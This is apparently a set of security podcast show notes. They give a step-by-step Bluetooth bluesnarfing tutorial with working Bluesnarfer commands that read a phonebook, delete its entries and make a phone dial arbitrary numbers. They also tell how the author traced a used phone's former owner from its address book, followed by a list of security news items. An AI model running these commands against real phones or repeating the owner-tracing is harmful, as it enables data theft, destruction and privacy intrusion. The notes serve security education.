Episode63

From Paul's Security Weekly
Jump to: navigation, search

Episode Media

mp3

Scanning for bluetooth and total pwnage with Bluesnarfer

irst off, you are going to want to install the bluez libraries, and bluez utilities for your Linux distro of choice. Or use Backtrack...

Plug in that USB adaptor! The USB dongle of choice that we use is the Linksys USBT100 - it is a class one device that can operate up to 100 meters, and it is hackable for an external antenna. You can buy them pre modded from Wardrivingworld.com

Most installations will automatically start up the bluetooth adaptor as the hci0 interface. We can verify this with one of the bluez tools hciconfig. hciconfig without any other command line options will show us info on all of our bluetooth adaptors. If hci0 isn't up, we can set it up, with hciconfig hci0 up.

Verify bluetoothe devices exist in your environment with hcitool, another bluez utility. Use hcitool scan, and it will return all of the available BT devices with the btaddr (Mac address). Success? Sweet.

Btscanner can be used to scan as well, and obtain info in a format that is a little easier to use. You'll need to download and compile btscanner - we found that with the Linksys USBT100 btscanner works best when started with the --no-reset option. This will prevent btscanner from resetting hte device before starting. btscanner will scan for discoverable devices once started with the i comand - b will perform a bruteforce scan, scanning for all possible BT btaddrs!

Bluescanner for win32! Won't work with the default widcomm drivers though.

hcitool can also be used to obatin much of the same info as btscanner  :-)

Got a vulnerable phone? Btscanner will compare the btaddr to a database, and list the attacks possible - mostly snarf attacks. The database is limited, so test what you discover in your environment.

record the btaddr of the device vulnerable to the snarf attack so we can use it with bluesnarfer. One problem with the default install of bluesnarfer is that bluesnarfer.h expects the bluetooth device to be connected to /dev/bluetooth/rfcomm/<device ID> (likely 0). I've tried modifying the source to point to the default install wothout much success and chasing my tail. Modding the source also isn't possible on Backtrack, where bluesnarfer doesn't work either! Yes, I tried 2.0.

The solution withe the default sourcecode is real easy, the this worlks for Backtack too. The problem is that the device nodes are missing for bluesnarfer to function, so let' create them. As root, do:

mkdir -p /dev/bluetooth/rfcomm then mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0

These will not survive a reboot, so you may want to add them to startup, or create a script  :-)

Once the nodes have been created, bluesnarfer will be happy. Let's use it.

In order to grab phonebook entries, we'll give bluesnarfer the -r switch folloewd by the phone book entries we want and the -b switch with the :

bluesnarfer -r 1-100 -b <btaddr>

Delete the phonebook? Sure!:

bluesnarfer -w 1-100 -b <btaddr>

Now the fun part. Custom AT commands. How about making the phone dial a number of our choice? We can issue AT commands to the vulnerable phones with the -c switch:

bluesnarfer -c 'ATDT5551212;' -b <baddr>

Note that we have to properly quote the AT command (with single quotes), and include a semicolon as the trailing command character.

Cell Phone Information disclosure via Ebay

So, some other serious notes. Information disclosure here? Sure. What is also interesting is not only obtaining this information remotely, is also obtaining this inforamtion from a used phone on ebay.

I just picked up a used Nokia 6310i from ebay, and it conveniently came preloaded, with an address book full of prper names and phone numbers with area codes. This was surprosing, as I figured that the seller would have wiped the phone!

While at The local cell phone store obtaining a prepaid sim card for the phone, I was also prompted by the phone for a keypad pin lock. I told the nice lady that I bought the phone off of e-bay and didn't know it. She took it in the back and removed it for me. Neat! What if I had stolen the phone? Would the IMEI be in the system as stolen? Maybe, as she even had a problem registering the phone in thier system...so she used HER IMEI on a tottaly differnt phone.

I also overheard the other nice lady at the cell phone store assisting a new customer who was getting a new phone, the Nice lady told the customer to check her address book on the new phone, as all of her phone numbers should have been moved over on the new phone with the SIM card....but were they off the old phone? Who knows.

So, with this phone I obtained off of ebay, I was able track down the person whom I belive the phone belonged to by researching the names and phone numbers of the individuals contained in the address book. I also had one other piece of tasty info - the startup screen was customized with "Frank's" name....

So, by doing some research, I was able to determine that "Frank" is a Certified Professional Landmen - one who deals with land aquisitions for the petroleun industry. "Frank" has lots of contacts in the greater Dallas, TX area. And his office is in the same vicinity...

Stories for Discussion

Abusing TCP/IP Name Resolution in Windows - [Paul] -

top 59 most influential security experts of 2007 - [Paul] - Why aren't we on the list!??!?!?!?!?!!!!?

Dark Reading Room's 7 Steps to a safer Wifi - [Paul] - Good stuff! Heed the warning!

Enhanced RDP Security In Vista - [Paul] - Finally! One of my biggest pet peeves!!

Upgrade Your Showave Flash pluging - [Paul] - Sweet attack vector...

GoDaddy is evil since they dissed Fyodor - [Paul] - And they suffered a DoS attack... lololololol

Screenshots of a botnet - [Paul] - Botnets, yummy

Worst Captcha Ever! - [Paul] - funny..

Malware Analysis - [Paul] - Malware is evil, so evil.....

OpenBSD IPv6 Kernel Remote DOS or exploit - [Larry/Nick] - The guys at CORE Labs are at it again, and the OpenBSD folks appear to brush it off. We're OpenBSD, we're INVINCIBLE! :-) Nick - L...ol

Reverse Engineering Malware, websense style - [Larry] A great write up on reverse engineering an unknown piece of malware. Delphi, yuck!

L33tUpl0ad - [Larry] - Another Dammned good idea from Irongeek. Found a tool that is awsome, but the author had disapeared, and so has the tool? Leet upload is a repository for all those tools that went missing.

VOIP threats to watch out for - [Larry] - I found this over at Hack in the Box, and gave it a read. Very good things to be aware of for VOIP installations, which you should be evaluating and testing (where do all of your secret conversations happen? likely over the phone which you suspect is secure). L33Dawg even chimed in about the Tactical VOIP Toolkit Which I can't wait to get ahold of.

Fingerprint for WPA authentication - [Larry] - Sounds cool, but have fingerprint readers been that wideley adopted to be ubiquitous. I think it might be a good idea, but destined to fail.

BlueLane protecting ur VMware VMs - [Larry] - Interesting, whou would have thought that rogue VMs (or non-updated ones) would be a threat. Neat.

Root DNS server attacks...calling card? - [Larry] - Some interesting thoughts about the motivation for attacking the root DNS servers a few weeks ago. Maybe a show of force (look at my bot net Ma!) by a botherder for a potential client?

Don't open that attachement... - [Larry] - ...even if you ask for it. Post a job ad online, get resumes. One of those resumes may be from a hacker with a nice PDF or Word exploit. Well, you asked for it!

Other Stories of Interest

Conference Media Pr0n - [Paul] - Blackhat videos are funny...

Federal Agencies Ban Vista - [Larry] - Note really for security reasons. I don't even think that they got that far in the evaluation.